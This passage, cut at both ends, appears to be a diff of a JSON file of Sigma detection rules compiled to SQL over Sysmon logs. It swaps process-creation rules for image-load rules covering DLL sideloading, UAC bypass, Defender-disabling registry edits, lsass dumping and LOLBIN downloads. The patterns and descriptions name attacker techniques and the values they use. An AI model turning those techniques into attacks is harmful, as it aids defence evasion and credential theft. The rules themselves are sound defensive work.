LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\RECYCLER\\\\%' ESCAPE '\\')) OR (CommandLine LIKE '%rundll32 %' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%.bin,%' ESCAPE '\\' OR CommandLine LIKE '%.tmp,%' ESCAPE '\\' OR CommandLine LIKE '%.dat,%' ESCAPE '\\' OR CommandLine LIKE '%.io,%' ESCAPE '\\' OR CommandLine LIKE '%.ini,%' ESCAPE '\\' OR CommandLine LIKE '%.db,%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ImageLoaded LIKE '%\\\\dbgcore.dll' ESCAPE '\\' AND NOT (((ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SoftwareDistribution\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SystemTemp\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_apt_lazarus_group_activity.yml" + "filename": "image_load_side_load_dbgcore_dll.yml" }, { - "title": "Reg Disable Security Service", - "id": "5e95028c-5229-4214-afae-d653d573d0ec", + "title": "Potential DLL Sideloading Via comctl32.dll", + "id": "6360757a-d460-456c-8b13-74cf0e60cceb", "status": "experimental", - "description": "Detects a suspicious reg.exe invocation that looks as if it would disable an important security service", - "author": "Florian Roth (Nextron Systems), John Lambert (idea), elhoim", + "description": "Detects potential DLL sideloading using comctl32.dll to obtain system privileges", + "author": "Nasreddine Bencherchali (Nextron Systems), Subhash Popuri (@pbssubhash)", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ - "Unknown", - "Other security solution installers" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%reg%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\') AND ((CommandLine LIKE '% /d 4%' ESCAPE '\\' AND CommandLine LIKE '% /v Start%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\Sense%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WinDefend%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsMpSvc%' ESCAPE '\\' OR CommandLine LIKE '%\\\\NisSrv%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WdBoot%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WdNisDrv%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WdNisSvc%' ESCAPE '\\' OR CommandLine LIKE '%\\\\wscsvc%' ESCAPE '\\' OR CommandLine LIKE '%\\\\SecurityHealthService%' ESCAPE '\\' OR CommandLine LIKE '%\\\\wuauserv%' ESCAPE '\\' OR CommandLine LIKE '%\\\\UsoSvc%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WdFilter%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppIDSvc%' ESCAPE '\\')) OR (CommandLine LIKE '% /d 1%' ESCAPE '\\' AND CommandLine LIKE '%Windows Defender%' ESCAPE '\\' AND (CommandLine LIKE '%DisableIOAVProtection%' ESCAPE '\\' OR CommandLine LIKE '%DisableOnAccessProtection%' ESCAPE '\\' OR CommandLine LIKE '%DisableRoutinelyTakingAction%' ESCAPE '\\' OR CommandLine LIKE '%DisableScanOnRealtimeEnable%' ESCAPE '\\' OR CommandLine LIKE '%DisableBlockAtFirstSeen%' ESCAPE '\\' OR CommandLine LIKE '%DisableBehaviorMonitoring%' ESCAPE '\\' OR CommandLine LIKE '%DisableEnhancedNotifications%' ESCAPE '\\' OR CommandLine LIKE '%DisableAntiSpyware%' ESCAPE '\\' OR CommandLine LIKE '%DisableAntiSpywareRealtimeProtection%' ESCAPE '\\' OR CommandLine LIKE '%DisableConfig%' ESCAPE '\\' OR CommandLine LIKE '%DisablePrivacyMode%' ESCAPE '\\' OR CommandLine LIKE '%SignatureDisableUpdateOnStartupWithoutEngine%' ESCAPE '\\' OR CommandLine LIKE '%DisableArchiveScanning%' ESCAPE '\\' OR CommandLine LIKE '%DisableIntrusionPreventionSystem%' ESCAPE '\\' OR CommandLine LIKE '%DisableScriptScanning%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\logonUI.exe.local\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\werFault.exe.local\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\consent.exe.local\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\narrator.exe.local\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\windows\\\\system32\\\\wermgr.exe.local\\\\%' ESCAPE '\\') AND ImageLoaded LIKE '%\\\\comctl32.dll' ESCAPE '\\')" ], - "filename": "proc_creation_win_reg_disable_sec_services.yml" + "filename": "image_load_side_load_comctl32.yml" }, { - "title": "WmiPrvSE Spawned PowerShell", - "id": "692f0bec-83ba-4d04-af7e-e884a96059b6", - "status": "stable", - "description": "Detects Powershell as a child of the WmiPrvSE process. Which could be a signe of remote access via WMI", - "author": "Markus Neis @Karneades", + "title": "UAC Bypass Using Iscsicpl - ImageLoad", + "id": "9ed5959a-c43c-4c59-84e3-d28628429456", + "status": "experimental", + "description": "Detects the \"iscsicpl.exe\" UAC bypass technique that leverages a DLL Search Order hijacking technique to load a custom DLL's from temp or a any user controlled location in the users %PATH%", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1047", - "attack.t1059.001" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ - "AppvClient", - "CCM" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\wmiprvse.exe' ESCAPE '\\' AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll'))) AND NOT ((CommandLine = 'null') OR (CommandLine = '')))" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\iscsicpl.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\iscsiexe.dll' ESCAPE '\\') AND NOT (ImageLoaded LIKE '%C:\\\\Windows\\\\%' ESCAPE '\\' AND ImageLoaded LIKE '%iscsiexe.dll%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_wmiprvse_spawns_powershell.yml" + "filename": "image_load_uac_bypass_iscsicpl.yml" }, { - "title": "Suspicious Process Parents", - "id": "cbec226f-63d9-4eca-9f52-dfb6652f24df", - "status": "experimental", - "description": "Detects suspicious parent processes that should not have any children or should only have a single possible child program", - "author": "Florian Roth (Nextron Systems)", + "title": "Time Travel Debugging Utility Usage - Image", + "id": "e76c8240-d68f-4773-8880-5c6f63595aaf", + "status": "test", + "description": "Detects usage of Time Travel Debugging Utility. Adversaries can execute malicious processes and dump processes, such as lsass.exe, via tttracer.exe.", + "author": "Ensar Şamil, @sblmsrsn, @oscd_initiative", + "tags": [ + "attack.defense_evasion", + "attack.credential_access", + "attack.t1218", + "attack.t1003.001" + ], "falsepositives": [ - "Unknown" + "Legitimate usage by software developers/testers" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\minesweeper.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\winver.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\bitsadmin.exe' ESCAPE '\\') OR ((ParentImage LIKE '%\\\\csrss.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\certutil.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\eventvwr.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\calc.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\notepad.exe' ESCAPE '\\') AND NOT (((Image LIKE '%\\\\WerFault.exe' ESCAPE '\\' OR Image LIKE '%\\\\wermgr.exe' ESCAPE '\\' OR Image LIKE '%\\\\conhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\mmc.exe' ESCAPE '\\' OR Image LIKE '%\\\\win32calc.exe' ESCAPE '\\' OR Image LIKE '%\\\\notepad.exe' ESCAPE '\\')) OR (Image = '')))))" + "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (ImageLoaded LIKE '%\\\\ttdrecord.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ttdwriter.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ttdloader.dll' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_parents.yml" + "filename": "image_load_tttracer_mod_load.yml" }, { - "title": "Use of W32tm as Timer", - "id": "6da2c9f5-7c53-401b-aacb-92c040ce1215", + "title": "DLL Loaded From Suspicious Location Via Cmspt.EXE", + "id": "75e508f7-932d-4ebc-af77-269237a84ce1", "status": "experimental", - "description": "When configured with suitable command line arguments, w32tm can act as a delay mechanism", - "author": "frack113", + "description": "Detects cmstp loading \"dll\" or \"ocx\" files from suspicious locations", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1124" + "attack.defense_evasion", + "attack.t1218.003" ], "falsepositives": [ - "Legitimate use" + "Unikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\w32tm.exe' ESCAPE '\\' OR OriginalFileName = 'w32time.dll') AND (CommandLine LIKE '%/stripchart%' ESCAPE '\\' AND CommandLine LIKE '%/computer:%' ESCAPE '\\' AND CommandLine LIKE '%/period:%' ESCAPE '\\' AND CommandLine LIKE '%/dataonly%' ESCAPE '\\' AND CommandLine LIKE '%/samples:%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\cmstp.exe' ESCAPE '\\' AND (ImageLoaded LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ProgramData\\\\%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Users\\\\%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR ImageLoaded LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\') AND (ImageLoaded LIKE '%.dll' ESCAPE '\\' OR ImageLoaded LIKE '%.ocx' ESCAPE '\\'))" ], - "filename": "proc_creation_win_w32tm.yml" + "filename": "image_load_cmstp_load_dll_from_susp_location.yml" }, { - "title": "Bad Opsec Defaults Sacrificial Processes With Improper Arguments", - "id": "a7c3d773-caef-227e-a7e7-c2f13c622329", - "status": "experimental", - "description": "Detects attackers using tooling with bad opsec defaults.\nE.g. spawning a sacrificial process to inject a capability into the process without taking into account how the process is normally run.\nOne trivial example of this is using rundll32.exe without arguments as a sacrificial process (default in CS, now highlighted by c2lint), running WerFault without arguments (Kraken - credit am0nsec), and other examples.\n", - "author": "Oleg Kolesnikov @securonix invrep_de, oscd.community, Florian Roth (Nextron Systems), Christian Burkard (Nextron Systems)", + "title": "GAC DLL Loaded Via Office Applications", + "id": "90217a70-13fc-48e4-b3db-0d836c5824ac", + "status": "test", + "description": "Detects any GAC DLL being loaded by an Office Product", + "author": "Antonlovesdnb", "tags": [ - "attack.defense_evasion", - "attack.t1218.011" + "attack.execution", + "attack.t1204.002" ], "falsepositives": [ - "Unlikely" + "Legitimate macro usage. Add the appropriate filter according to your environment" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\WerFault.exe' ESCAPE '\\' AND CommandLine LIKE '%WerFault.exe' ESCAPE '\\') OR (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND CommandLine LIKE '%rundll32.exe' ESCAPE '\\') OR (Image LIKE '%\\\\regsvcs.exe' ESCAPE '\\' AND CommandLine LIKE '%regsvcs.exe' ESCAPE '\\') OR (Image LIKE '%\\\\regasm.exe' ESCAPE '\\' AND CommandLine LIKE '%regasm.exe' ESCAPE '\\') OR (Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND CommandLine LIKE '%regsvr32.exe' ESCAPE '\\')) AND NOT ((ParentImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND ParentImage LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\EdgeUpdate\\\\Install\\\\{%' ESCAPE '\\' AND ParentImage LIKE '%\\\\setup.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%\\\\setup.exe\" --install-archive=\"C:\\\\Users\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\excel.exe' ESCAPE '\\' OR Image LIKE '%\\\\mspub.exe' ESCAPE '\\' OR Image LIKE '%\\\\onenote.exe' ESCAPE '\\' OR Image LIKE '%\\\\onenoteim.exe' ESCAPE '\\' OR Image LIKE '%\\\\outlook.exe' ESCAPE '\\' OR Image LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR Image LIKE '%\\\\winword.exe' ESCAPE '\\') AND ImageLoaded LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\assembly\\\\GAC\\_MSIL%' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_bad_opsec_sacrificial_processes.yml" + "filename": "image_load_office_dotnet_gac_dll_load.yml" }, { - "title": "MMC Spawning Windows Shell", - "id": "05a2ab7e-ce11-4b63-86db-ab32e763e11d", + "title": "Svchost DLL Search Order Hijack", + "id": "602a1f13-c640-4d73-b053-be9a2fa58b77", "status": "test", - "description": "Detects a Windows command line executable started from MMC", - "author": "Karneades, Swisscom CSIRT", + "description": "Detects DLL sideloading of DLLs that are loaded by the SCM for some services (IKE, IKEEXT, SessionEnv) which do not exists on a typical modern system\nIKEEXT and SessionEnv service, as they call LoadLibrary on files that do not exist within C:\\Windows\\System32\\ by default.\nAn attacker can place their malicious logic within the PROCESS_ATTACH block of their library and restart the aforementioned services \"svchost.exe -k netsvcs\" to gain code execution on a remote machine.\n", + "author": "SBousseaden", "tags": [ - "attack.lateral_movement", - "attack.t1021.003" + "attack.persistence", + "attack.defense_evasion", + "attack.t1574.002", + "attack.t1574.001" + ], + "falsepositives": [ + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\mmc.exe' ESCAPE '\\' AND ((Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\') OR Image LIKE '%\\\\BITSADMIN%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\svchost.exe' ESCAPE '\\' AND (ImageLoaded LIKE '%\\\\tsmsisrv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tsvipsrv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wlbsctrl.dll' ESCAPE '\\')) AND NOT (ImageLoaded LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_mmc_susp_child_process.yml" + "filename": "image_load_side_load_svchost_dlls.yml" }, { - "title": "Suspicious DumpMinitool Usage", - "id": "eb1c4225-1c23-4241-8dd4-051389fde4ce", + "title": "Suspicious Volume Shadow Copy Vsstrace.dll Load", + "id": "48bfd177-7cf2-412b-ad77-baf923489e82", "status": "experimental", - "description": "Detects suspicious ways to use of a Visual Studio bundled tool named DumpMinitool.exe", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the image load of VSS DLL by uncommon executables", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1036", - "attack.t1003.001" + "attack.impact", + "attack.t1490" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\DumpMinitool.exe' ESCAPE '\\' OR OriginalFileName = 'DumpMinitool.exe') AND ((NOT ((Image LIKE '%\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Extensions\\\\%' ESCAPE '\\')) OR CommandLine LIKE '%.txt%' ESCAPE '\\') OR (CommandLine LIKE '% Full%' ESCAPE '\\' AND NOT (CommandLine LIKE '%--dumpType%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ImageLoaded LIKE '%\\\\vsstrace.dll' ESCAPE '\\' AND NOT (((Image LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\ImmersiveControlPanel\\\\SystemSettings.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\Temp\\\\{%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_dumpminitool_susp_execution.yml" + "filename": "image_load_dll_vsstrace_susp_load.yml" }, { - "title": "Suspicious Certreq Command to Download", - "id": "4480827a-9799-4232-b2c4-ccc6c4e9e12b", + "title": "HackTool - SharpEvtMute DLL Load", + "id": "49329257-089d-46e6-af37-4afce4290685", "status": "experimental", - "description": "Detects a suspicious certreq execution taken from the LOLBAS examples, which can be abused to download (small) files", - "author": "Christian Burkard (Nextron Systems)", + "description": "Detects the load of EvtMuteHook.dll, a key component of SharpEvtHook, a tool that tampers with the Windows event logs", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.defense_evasion", + "attack.t1562.002" ], "falsepositives": [ - "Unlikely" + "Other DLLs with the same Imphash" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\certreq.exe' ESCAPE '\\' OR OriginalFileName = 'CertReq.exe') AND (CommandLine LIKE '% -Post %' ESCAPE '\\' AND CommandLine LIKE '% -config %' ESCAPE '\\' AND CommandLine LIKE '% http%' ESCAPE '\\' AND CommandLine LIKE '% C:\\\\windows\\\\win.ini %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Hashes LIKE '%IMPHASH=330768A4F172E10ACB6287B87289D83B%' ESCAPE '\\' OR Imphash = '330768a4f172e10acb6287b87289d83b'))" ], - "filename": "proc_creation_win_lolbin_susp_certreq_download.yml" + "filename": "image_load_hktl_sharpevtmute.yml" }, { - "title": "Suspicious NTLM Authentication on the Printer Spooler Service", - "id": "bb76d96b-821c-47cf-944b-7ce377864492", + "title": "Potential Rcdll.DLL Sideloading", + "id": "6e78b74f-c762-4800-82ad-f66787f10c8a", "status": "experimental", - "description": "Detects a privilege elevation attempt by coercing NTLM authentication on the Printer Spooler service", - "author": "Elastic (idea), Tobias Michalski (Nextron Systems)", + "description": "Detects potential DLL sideloading of rcdll.dll", + "author": "X__Junior (Nextron Systems)", "tags": [ + "attack.defense_evasion", "attack.privilege_escalation", - "attack.credential_access", - "attack.t1212" + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND (CommandLine LIKE '%C:\\\\windows\\\\system32\\\\davclnt.dll,DavSetCookie%' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\' AND (CommandLine LIKE '%spoolss%' ESCAPE '\\' OR CommandLine LIKE '%srvsvc%' ESCAPE '\\' OR CommandLine LIKE '%/print/pipe/%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ImageLoaded LIKE '%\\\\rcdll.dll' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Windows Kits\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_rundll32_ntlmrelay.yml" + "filename": "image_load_side_load_rcdll.yml" }, { - "title": "PowerShell Base64 Encoded Invoke Keyword", - "id": "6385697e-9f1b-40bd-8817-f4a91f40508e", - "status": "test", - "description": "Detects UTF-8 and UTF-16 Base64 encoded powershell 'Invoke-' calls", - "author": "pH-T (Nextron Systems), Harjot Singh, '@cyb3rjy0t'", + "title": "DLL Sideloading Of DBGHELP.DLL", + "id": "6414b5cd-b19d-447e-bb5e-9f03940b5784", + "status": "experimental", + "description": "Detects DLL sideloading of \"dbghelp.dll\"", + "author": "Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)", "tags": [ - "attack.execution", - "attack.t1059.001", "attack.defense_evasion", - "attack.t1027" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ - "Unlikely" + "Legitimate applications loading their own versions of the DLL mentioned in this rule" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%SQBuAHYAbwBrAGUALQ%' ESCAPE '\\' OR CommandLine LIKE '%kAbgB2AG8AawBlAC0A%' ESCAPE '\\' OR CommandLine LIKE '%JAG4AdgBvAGsAZQAtA%' ESCAPE '\\' OR CommandLine LIKE '%SW52b2tlL%' ESCAPE '\\' OR CommandLine LIKE '%ludm9rZS%' ESCAPE '\\' OR CommandLine LIKE '%JbnZva2Ut%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ImageLoaded LIKE '%\\\\dbghelp.dll' ESCAPE '\\' AND NOT (((ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SoftwareDistribution\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SystemTemp\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\') OR (ImageLoaded LIKE '%\\\\Epic Games\\\\Launcher\\\\Engine\\\\Binaries\\\\ThirdParty\\\\DbgHelp\\\\dbghelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Epic Games\\\\MagicLegends\\\\x86\\\\dbghelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Anaconda3\\\\Lib\\\\site-packages\\\\vtrace\\\\platforms\\\\windll\\\\amd64\\\\dbghelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Anaconda3\\\\Lib\\\\site-packages\\\\vtrace\\\\platforms\\\\windll\\\\i386\\\\dbghelp.dll' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_powershell_base64_invoke.yml" + "filename": "image_load_side_load_dbghelp_dll.yml" }, { - "title": "Suspicious AgentExecutor PowerShell Execution", - "id": "c0b40568-b1e9-4b03-8d6c-b096da6da9ab", + "title": "DLL Sideloading Of ShellChromeAPI.DLL", + "id": "ee4c5d06-3abc-48cc-8885-77f1c20f4451", "status": "experimental", - "description": "Detects execution of the AgentExecutor.exe binary. Which can be abused as a LOLBIN to execute powershell scripts with the ExecutionPolicy \"Bypass\" or any binary named \"powershell.exe\" located in the path provided by 6th positional argument", - "author": "Nasreddine Bencherchali (Nextron Systems), memory-shards", + "description": "Detects processes loading the non-existent DLL \"ShellChromeAPI\". One known example is the \"DeviceEnroller\" binary in combination with the \"PhoneDeepLink\" flag tries to load this DLL.\nAdversaries can drop their own renamed DLL and execute it via DeviceEnroller.exe using this parameter\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1218" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\AgentExecutor.exe' ESCAPE '\\' OR OriginalFileName = 'AgentExecutor.exe') AND (CommandLine LIKE '% -powershell%' ESCAPE '\\' OR CommandLine LIKE '% -remediationScript%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%C:\\\\Windows\\\\SysWOW64\\\\WindowsPowerShell\\\\v1.0\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ImageLoaded LIKE '%\\\\ShellChromeAPI.dll' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_agentexecutor_susp_usage.yml" + "filename": "image_load_side_load_shell_chrome_api.yml" }, { - "title": "TrustedPath UAC Bypass Pattern", - "id": "4ac47ed3-44c2-4b1f-9d51-bf46e8914126", + "title": "VBA DLL Loaded Via Office Application", + "id": "e6ce8457-68b1-485b-9bdd-3c2b5d679aa9", "status": "test", - "description": "Detects indicators of a UAC bypass method by mocking directories", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects VB DLL's loaded by an office application. Which could indicate the presence of VBA Macros.", + "author": "Antonlovesdnb", "tags": [ - "attack.defense_evasion", - "attack.t1548.002" + "attack.execution", + "attack.t1204.002" ], "falsepositives": [ - "Unknown" + "Legitimate macro usage. Add the appropriate filter according to your environment" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%C:\\\\Windows \\\\System32\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\excel.exe' ESCAPE '\\' OR Image LIKE '%\\\\mspub.exe' ESCAPE '\\' OR Image LIKE '%\\\\onenote.exe' ESCAPE '\\' OR Image LIKE '%\\\\onenoteim.exe' ESCAPE '\\' OR Image LIKE '%\\\\outlook.exe' ESCAPE '\\' OR Image LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR Image LIKE '%\\\\winword.exe' ESCAPE '\\') AND (ImageLoaded LIKE '%\\\\VBE7.DLL' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\VBEUI.DLL' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\VBE7INTL.DLL' ESCAPE '\\'))" ], - "filename": "proc_creation_win_uac_bypass_trustedpath.yml" + "filename": "image_load_office_vbadll_load.yml" }, { - "title": "Suspicious Spool Service Child Process", - "id": "dcdbc940-0bff-46b2-95f3-2d73f848e33b", - "status": "test", - "description": "Detects suspicious print spool service (spoolsv.exe) child processes.", - "author": "Justin C. (@endisphotic), @dreadphones (detection), Thomas Patzke (Sigma rule)", + "title": "Suspicious Volume Shadow Copy VSS_PS.dll Load", + "id": "333cdbe8-27bb-4246-bf82-b41a0dca4b70", + "status": "experimental", + "description": "Detects the image load of vss_ps.dll by uncommon 